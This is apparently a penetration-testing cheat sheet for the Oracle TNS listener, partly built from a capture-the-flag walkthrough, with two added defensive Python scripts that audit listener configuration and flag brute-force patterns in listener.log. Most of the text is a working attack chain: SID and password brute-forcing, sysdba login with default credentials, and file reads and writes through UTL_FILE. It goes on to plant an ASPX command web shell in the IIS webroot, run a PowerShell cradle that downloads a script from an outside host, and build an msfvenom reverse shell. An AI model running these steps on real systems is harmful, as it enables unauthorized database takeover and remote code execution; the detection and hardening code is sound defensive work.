1521,1522-1529 - Oracle TNS Listener

TNS listener version

nmap --script "oracle-tns-version" -p 1521 -T4 -sV <IP>
msf> use auxiliary/scanner/oracle/tnslsnr_version
#apt install tnscmd10g
tnscmd10g version -p 1521 -h <IP>

Other useful TNS listener commands:

| Command | Purpose |
|---|---|
| ping | Ping the listener |
| version | Provide output of the listener version and platform information |
| status | Return the current status and variables used by the listener |
| services | Dump service data |
| debug | Dump debugging information to the listener log |
| reload | Reload the listener configuration file |
| save_config | Write the listener configuration file to a backup location |
| stop | Invoke listener shutdown |

hydra -P rockyou.txt -t 32 -s 1521 host.victim oracle-listener
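Whether the commands in the table above (and the listener-password guessing in the hydra line) are reachable from the network at all depends on a handful of listener.ora and sqlnet.ora settings. The following check is an added example, not code from the original page or from any of the tools it lists: it parses Oracle's nested name-value syntax and flags ADMIN_RESTRICTIONS_LISTENER, LOCAL_OS_AUTHENTICATION_LISTENER, LOGGING_LISTENER, TCP.VALIDNODE_CHECKING and TCP.INVITED_NODES, judging unset parameters by their Oracle defaults. The two configuration samples are constructed; the parser handles the general nested syntax, not only the lines shown.

```python
import re

# Constructed sample of a weak listener.ora: admin restrictions unset and
# local OS authentication switched off.
SAMPLE_LISTENER_ORA = """\
LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = 0.0.0.0)(PORT = 1521))
    )
  )
LOCAL_OS_AUTHENTICATION_LISTENER = OFF
"""
# Constructed sample of a sqlnet.ora with node checking on but no allow list.
SAMPLE_SQLNET_ORA = """\
SQLNET.AUTHENTICATION_SERVICES = (NTS)
TCP.VALIDNODE_CHECKING = YES
"""


def _tokenize(text):
    """Split *.ora text into '(', ')', '=', ',' and bare words; '#' starts a comment."""
    return re.findall(r"[()=,]|[^\s()=,]+", re.sub(r"#.*", "", text))


class NvParser:
    """Recursive-descent parser for the NAME = value / (NAME = value) syntax of *.ora files."""

    def __init__(self, text):
        self.toks = _tokenize(text)
        self.i = 0

    def _peek(self):
        return self.toks[self.i] if self.i < len(self.toks) else None

    def _take(self):
        tok = self._peek()
        self.i += 1
        return tok

    def parse(self):
        """Return {PARAMETER: value}; values are atoms, dicts, or lists of either."""
        params = {}
        while self._peek() is not None:
            name, value = self._pair()
            params[name.upper()] = value
        return params

    def _pair(self):
        name = self._take()
        if self._take() != "=":
            raise ValueError(f"expected '=' after {name!r}")
        return name, self._value()

    def _value(self):
        if self._peek() != "(":
            return self._take()  # bare atom such as OFF or 1521
        groups = []
        while self._peek() == "(":  # one or more parenthesised groups
            self._take()
            groups.append(self._group())
            if self._take() != ")":
                raise ValueError("unbalanced parentheses")
        return groups if len(groups) > 1 else groups[0]

    def _group(self):
        # Either a nested NAME = value pair or a comma-separated list of atoms.
        if self.i + 1 < len(self.toks) and self.toks[self.i + 1] == "=":
            name, value = self._pair()
            return {name.upper(): value}
        atoms = []
        while self._peek() not in (")", None):
            tok = self._take()
            if tok != ",":
                atoms.append(tok)
        return atoms


def _setting(params, name, default):
    return str(params.get(name, default)).upper()


def check_listener_ora(text, listener="LISTENER"):
    """Findings for a listener.ora; unset parameters are judged by their Oracle defaults."""
    p = NvParser(text).parse()
    findings = []
    if _setting(p, f"ADMIN_RESTRICTIONS_{listener}", "OFF") != "ON":
        findings.append(f"ADMIN_RESTRICTIONS_{listener} is not ON: runtime SET commands "
                        "are accepted over the control connection")
    if _setting(p, f"LOCAL_OS_AUTHENTICATION_{listener}", "ON") != "ON":
        findings.append(f"LOCAL_OS_AUTHENTICATION_{listener} is OFF: stop/reload/save_config "
                        "and listener password guessing are possible from remote hosts")
    if _setting(p, f"LOGGING_{listener}", "ON") != "ON":
        findings.append(f"LOGGING_{listener} is OFF: version/status/SID probes leave no listener.log trace")
    return findings


def check_sqlnet_ora(text):
    """Findings for a sqlnet.ora: node checking should be on with an explicit allow list."""
    p = NvParser(text).parse()
    if _setting(p, "TCP.VALIDNODE_CHECKING", "NO") != "YES":
        return ["TCP.VALIDNODE_CHECKING is not YES: any host may reach the listener"]
    if not p.get("TCP.INVITED_NODES"):
        return ["TCP.VALIDNODE_CHECKING is YES but TCP.INVITED_NODES is empty"]
    return []


if __name__ == "__main__":
    for finding in check_listener_ora(SAMPLE_LISTENER_ORA) + check_sqlnet_ora(SAMPLE_SQLNET_ORA):
        print("[!]", finding)
```

Run it against the real files under `$ORACLE_HOME/network/admin`; the listener name suffix must match the listener defined in the file (here `LISTENER`). With local OS authentication on, the listener only honours stop/reload/save_config from the local Oracle OS user, which is what makes the hydra attempt above pointless on a default 10g+ install.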

SID enumeration

What is a SID

The SID (Service Identifier) is essentially the database name. Depending on the install you may have one or more default SIDs, or even a totally custom, DBA-defined SID.

In some old versions (this works in version 9) you could simply ask for the SIDs and the database would send them to you:

tnscmd10g status -p 1521 -h <IP> #The SIDs are inside: SERVICE=(SERVICE_NAME=<SID_NAME>)

#msf1
msf> use auxiliary/scanner/oracle/sid_enum
msf> set rhost <IP>
msf> run
#msf2
msf> use auxiliary/admin/oracle/tnscmd
msf> set CMD (CONNECT_DATA=(COMMAND=STATUS))
msf> set rhost <IP>
msf> run #The SID are inside: SERVICE=(SERVICE_NAME=<SID_NAME>)

If you can't obtain the SIDs this way, you will need to brute-force them:

SID Bruteforce

I have merged the nmap and MSF sid lists into this one (without duplicates):

hydra -L /usr/share/metasploit-framework/data/wordlists/sid.txt -s 1521 <IP> oracle-sid


patator oracle_login host=<IP> sid=FILE0 0=sids-oracle.txt -x ignore:code=ORA-12505


./odat.py sidguesser -s $SERVER -d $SID --sids-file=./sids.txt


msf> use auxiliary/admin/oracle/sid_brute #This will use the list located at /usr/share/metasploit-framework/data/wordlists/sid.txt


nmap --script +oracle-sid-brute -p 1521 10.11.1.202 #This will use the list located at /usr/share/nmap/nselib/data/oracle-sids

In order to use oracle_login with patator you need to install:

pip3 install cx_Oracle --upgrade

User/Pass bruteforce

/opt/odat/odat.py sidguesser -s 10.10.10.82 -p 1521 --sids-file sids-oracle.txt

/opt/odat/odat.py passwordguesser -d XE -s 10.10.10.82 -p 1521 --accounts-file /opt/odat/accounts/accounts.txt 
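Both the SID guessing above and the password guessing against a known SID leave a distinctive trace in the listener's own log: each rejected SID is written as an establish entry with return code 12505 (the ORA-12505 that the patator line ignores), and each password attempt opens a fresh connection, so a guessing tool shows up as a burst of accepted establishes from one source to one service. The script below is an added example, not code from the page or from any of the tools it lists. It parses constructed listener.log lines, lists listener control commands, and flags SID guessing and connection bursts per source address. The line layout (`timestamp * connect data * ... * return code`) and the 12505 code are assumptions about the standard listener.log format; the thresholds are arbitrary and tunable.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed listener.log excerpt: a "status" command, three SID guesses refused
# with 12505, a burst of sqlplus connections from one host, and one normal
# connection from an application server.
SAMPLE_LOG = """\
25-DEC-2020 19:58:40 * (CONNECT_DATA=(CID=(PROGRAM=)(HOST=kali)(USER=root))(COMMAND=status)(ARGUMENTS=64)(SERVICE=LISTENER)(VERSION=186647296)) * status * 0
25-DEC-2020 19:59:01 * (CONNECT_DATA=(SERVICE_NAME=ORCL)(CID=(PROGRAM=sqlplus)(HOST=kali)(USER=root))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.78)(PORT=41230)) * establish * ORCL * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
25-DEC-2020 19:59:01 * (CONNECT_DATA=(SERVICE_NAME=PROD)(CID=(PROGRAM=sqlplus)(HOST=kali)(USER=root))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.78)(PORT=41231)) * establish * PROD * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
25-DEC-2020 19:59:02 * (CONNECT_DATA=(SERVICE_NAME=TEST)(CID=(PROGRAM=sqlplus)(HOST=kali)(USER=root))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.78)(PORT=41232)) * establish * TEST * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
25-DEC-2020 20:00:24 * (CONNECT_DATA=(SERVICE_NAME=XE)(CID=(PROGRAM=sqlplus)(HOST=kali)(USER=root))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.78)(PORT=41240)) * establish * XE * 0
25-DEC-2020 20:00:25 * (CONNECT_DATA=(SERVICE_NAME=XE)(CID=(PROGRAM=sqlplus)(HOST=kali)(USER=root))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.78)(PORT=41241)) * establish * XE * 0
25-DEC-2020 20:00:25 * (CONNECT_DATA=(SERVICE_NAME=XE)(CID=(PROGRAM=sqlplus)(HOST=kali)(USER=root))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.78)(PORT=41242)) * establish * XE * 0
25-DEC-2020 20:00:26 * (CONNECT_DATA=(SERVICE_NAME=XE)(CID=(PROGRAM=sqlplus)(HOST=kali)(USER=root))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.78)(PORT=41243)) * establish * XE * 0
25-DEC-2020 20:05:00 * (CONNECT_DATA=(SERVICE_NAME=XE)(CID=(PROGRAM=w3wp.exe)(HOST=WEBSRV)(USER=IIS))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.10.5)(PORT=50001)) * establish * XE * 0
"""

TS_FMT = "%d-%b-%Y %H:%M:%S"


def parse_line(line):
    """Parse one listener.log entry; returns None for TNS-xxxxx message lines."""
    fields = line.strip().split(" * ")
    if len(fields) < 4 or not fields[-1].isdigit():
        return None
    try:
        ts = datetime.strptime(fields[0], TS_FMT)
    except ValueError:
        return None
    entry = {"ts": ts, "code": int(fields[-1])}
    # CID HOST is supplied by the client and can be anything; keep it only as a hint.
    cid = re.search(r"\(CID=.*?\(HOST=([^)]*)\)", fields[1])
    entry["cid_host"] = cid.group(1) if cid else ""
    cmd = re.search(r"\(COMMAND=([^)]*)\)", fields[1])
    if cmd:  # control command: ts * connect_data * command * code
        entry["kind"], entry["command"] = "command", cmd.group(1).lower()
    else:  # connection: ts * connect_data * address * establish * service * code
        entry["kind"], entry["service"] = fields[-3], fields[-2]
        addr = re.search(r"\(HOST=([^)]*)\)", fields[2])
        entry["host"] = addr.group(1) if addr else ""  # peer address seen by the listener
    return entry


def analyze(log_text, guess_threshold=3, burst_count=3, burst_window=timedelta(seconds=10)):
    """Return listener commands, SID-guessing sources and connection bursts."""
    entries = [e for e in map(parse_line, log_text.splitlines()) if e]
    report = {"commands": [], "sid_guessing": {}, "bursts": {}}
    # 1. Control commands are normally issued locally by the DBA with lsnrctl.
    for e in entries:
        if e["kind"] == "command":
            report["commands"].append((e["ts"], e["cid_host"], e["command"]))
    # 2. SID guessing: repeated refusals with 12505 (unknown SID) from one source.
    refused = defaultdict(int)
    for e in entries:
        if e["kind"] == "establish" and e["code"] == 12505:
            refused[e["host"]] += 1
    report["sid_guessing"] = {h: n for h, n in refused.items() if n >= guess_threshold}
    # 3. Password guessing opens a new session per attempt, so it appears as a
    #    burst of accepted connections from one source to one service.
    stamps_by_key = defaultdict(list)
    for e in entries:
        if e["kind"] == "establish" and e["code"] == 0:
            stamps_by_key[(e["host"], e["service"])].append(e["ts"])
    for key, stamps in stamps_by_key.items():
        stamps.sort()
        for i in range(len(stamps) - burst_count + 1):
            if stamps[i + burst_count - 1] - stamps[i] <= burst_window:
                report["bursts"][key] = len(stamps)
                break
    return report


if __name__ == "__main__":
    r = analyze(SAMPLE_LOG)
    for ts, host, cmd in r["commands"]:
        print(f"[cmd]   {ts} {cmd!r} (client-claimed host {host!r})")
    for host, n in r["sid_guessing"].items():
        print(f"[sid]   {host}: {n} unknown-SID refusals")
    for (host, svc), n in r["bursts"].items():
        print(f"[burst] {host} -> {svc}: {n} connections")
```

The listener log only sees the connection handshake, not authentication, so failed passwords themselves are not in it; the burst of establishes is the signal, and the matching ORA-01017 failures live in the database audit trail. Control-command entries carry no network address, only the client-supplied CID fields, which is why the script reports that host as a hint rather than a source.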

To RCE

#Brute force password
odat passwordguesser -d XE -s 10.10.10.82 -p 1521 --accounts-file /usr/share/odat/accounts/accounts.txt


#Try to access
sqlplus scott/tiger@10.10.10.82:1521/XE

SQL> SET PAGESIZE 500;
SQL> SET LINESIZE 500;
SQL> SELECT * FROM V$VERSION;
BANNER
--------------------------------------------------------------------------------
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
PL/SQL Release 11.2.0.2.0 - Production
CORE    11.2.0.2.0      Production
TNS for 64-bit Windows: Version 11.2.0.2.0 - Production
NLSRTL Version 11.2.0.2.0 - Production

SQL> SELECT * FROM all_users;
USERNAME                          USER_ID CREATED
------------------------------ ---------- ---------
XS$NULL                        2147483638 29-MAY-14
SCOTT                                  48 01-JAN-18
APEX_040000                            47 29-MAY-14
APEX_PUBLIC_USER                       45 29-MAY-14
FLOWS_FILES                            44 29-MAY-14
HR                                     43 29-MAY-14
MDSYS                                  42 29-MAY-14
ANONYMOUS                              35 29-MAY-14
XDB                                    34 29-MAY-14
CTXSYS                                 32 29-MAY-14
APPQOSSYS                              30 29-MAY-14
DBSNMP                                 29 29-MAY-14
ORACLE_OCM                             21 29-MAY-14
DIP                                    14 29-MAY-14
OUTLN                                   9 29-MAY-14
SYSTEM                                  5 29-MAY-14
SYS                                     0 29-MAY-14
17 rows selected.

To check whether the user's credentials are those of a sysdba or sysoper:

SQL> SELECT * FROM user_role_privs;
USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT                          CONNECT                        NO  YES NO
SCOTT                          RESOURCE                       NO  YES NO


#But logging in with sqlplus scott/tiger@10.10.10.82:1521/XE 'as sysdba' shows us a lot more

SQL> SELECT * FROM user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS                            ADM_PARALLEL_EXECUTE_TASK      YES YES NO
SYS                            APEX_ADMINISTRATOR_ROLE        YES YES NO
SYS                            AQ_ADMINISTRATOR_ROLE          YES YES NO
SYS                            AQ_USER_ROLE                   YES YES NO
SYS                            AUTHENTICATEDUSER              YES YES NO
SYS                            CONNECT                        YES YES NO
SYS                            CTXAPP                         YES YES NO
SYS                            DATAPUMP_EXP_FULL_DATABASE     YES YES NO
SYS                            DATAPUMP_IMP_FULL_DATABASE     YES YES NO
SYS                            DBA                            YES YES NO
SYS                            DBFS_ROLE                      YES YES NO
SYS                            DELETE_CATALOG_ROLE            YES YES NO
SYS                            EXECUTE_CATALOG_ROLE           YES YES NO
SYS                            EXP_FULL_DATABASE              YES YES NO
SYS                            GATHER_SYSTEM_STATISTICS       YES YES NO
SYS                            HS_ADMIN_EXECUTE_ROLE          YES YES NO
SYS                            HS_ADMIN_ROLE                  YES YES NO
SYS                            HS_ADMIN_SELECT_ROLE           YES YES NO
SYS                            IMP_FULL_DATABASE              YES YES NO
SYS                            LOGSTDBY_ADMINISTRATOR         YES YES NO
SYS                            OEM_ADVISOR                    YES YES NO
SYS                            OEM_MONITOR                    YES YES NO
SYS                            PLUSTRACE                      YES YES NO
SYS                            RECOVERY_CATALOG_OWNER         YES YES NO
SYS                            RESOURCE                       YES YES NO
SYS                            SCHEDULER_ADMIN                YES YES NO
SYS                            SELECT_CATALOG_ROLE            YES YES NO
SYS                            XDBADMIN                       YES YES NO
SYS                            XDB_SET_INVOKER                YES YES NO
SYS                            XDB_WEBSERVICES                YES YES NO
SYS                            XDB_WEBSERVICES_OVER_HTTP      YES YES NO
SYS                            XDB_WEBSERVICES_WITH_PUBLIC    YES YES NO

32 rows selected.

Read/write files in Oracle DB

Once logged in as sysdba, we can run scripts that read and write files on the database host using the UTL_FILE package. I took the code from here. To read the Windows hosts file, we write a .sql script with the commands and then run it from SQL*Plus by prefixing its name with @.

SET SERVEROUTPUT ON
DECLARE
  f       UTL_FILE.FILE_TYPE;
  sBuffer VARCHAR2(8000);
BEGIN
  -- open the file read-only; the directory must be permitted by UTL_FILE_DIR or a DIRECTORY object
  f := UTL_FILE.FOPEN('C:/Windows/System32/drivers/etc', 'hosts', 'r');
  LOOP
    UTL_FILE.GET_LINE(f, sBuffer);  -- raises NO_DATA_FOUND at end of file
    DBMS_OUTPUT.PUT_LINE(sBuffer);
  END LOOP;
EXCEPTION
  WHEN NO_DATA_FOUND THEN
    UTL_FILE.FCLOSE(f);
END;
/
root@kali:~/CTF/HTB/Silo# rlwrap -r sqlplus scott/tiger@10.10.10.82:1521/XE 'as sysdba'
SQL*Plus: Release 19.0.0.0.0 - Production on Fri Dec 25 19:58:40 2020
Version 19.9.0.0.0
Copyright (c) 1982, 2020, Oracle.  All rights reserved.
Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
SQL> @read_hosts.sql
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host
# localhost name resolution is handled within DNS itself.
#       127.0.0.1       localhost
#       ::1             localhost

PL/SQL procedure successfully completed.

https://github.com/0xdea/exploits/blob/master/oracle/raptor_orafile.sql

I tested this .sql script by uploading a simple text file to the default Windows IIS webroot folder.

root@kali:~/CTF/HTB/Silo# rlwrap -r sqlplus scott/tiger@10.10.10.82:1521/XE 'as sysdba'

SQL*Plus: Release 19.0.0.0.0 - Production on Fri Dec 25 20:00:24 2020
Version 19.9.0.0.0

Copyright (c) 1982, 2020, Oracle.  All rights reserved.


Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production

SQL> @raptor_orafile.sql

Procedure created.
Procedure created.

SQL> exec utlwritefile('C:/inetpub/wwwroot', 'test.txt', 'Testing write');
PL/SQL procedure successfully completed.

Then visiting http://10.10.10.82/test.txt we see

Upload aspx shell – RCE

SQL> exec utlwritefile('C:/inetpub/wwwroot', 'shell.aspx', '<%@ Page Language="C#" Debug="true" Trace="false" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){}string ExcuteCmd(string arg){ProcessStartInfo psi = new ProcessStartInfo();psi.FileName = "cmd.exe";psi.Argumentsc "+arg;psi.RedirectStandardOutput = true;psi.UseShellExecute = false;Process p = Process.Start(psi);StreamReader stmrdr = p.StandardOutput;string s = stmrdr.ReadToEnd();stmrdr.Close();return s;}void cmdExe_Click(object sender, System.EventArgs e){Response.Write("<pre>");Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));Response.Write("</pre>");}</script><HTML><bodyasp:TextBox id="txtArg" runat="server" Width="250px"></asp:TextBox><asp:Button id="testing" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button><asp:Label id="lblText" runat="server">Command:</asp:Label></form></body></HTML>');

PL/SQL procedure successfully completed.

*
ERROR at line 1:
ORA-29285: file write error
ORA-06512: at "SYS.UTL_FILE", line 77
ORA-06512: at "SYS.UTL_FILE", line 690
ORA-06512: at "SYS.UTLWRITEFILE", line 7
ORA-06512: at line 1

root@kali:~/CTF/HTB/Silo# echo 'IEX(New-Object Net.WebClient).downloadString("http://10.10.14.78/rshell.ps1")' | iconv -t UTF-16LE | base64 -w0
SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADcAOAAvAHIAcwBoAGUAbABsAC4AcABzADEAIgApAAoA

OR

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.118 LPORT=1234 -f aspx > shell.aspx


odat dbmsxslprocessor -s silo.htb -d XE -U scott -P tiger --putFile "C:\inetpub\wwwroot" "shell.aspx" "/root/opt/silo/shell.aspx" --sysdba
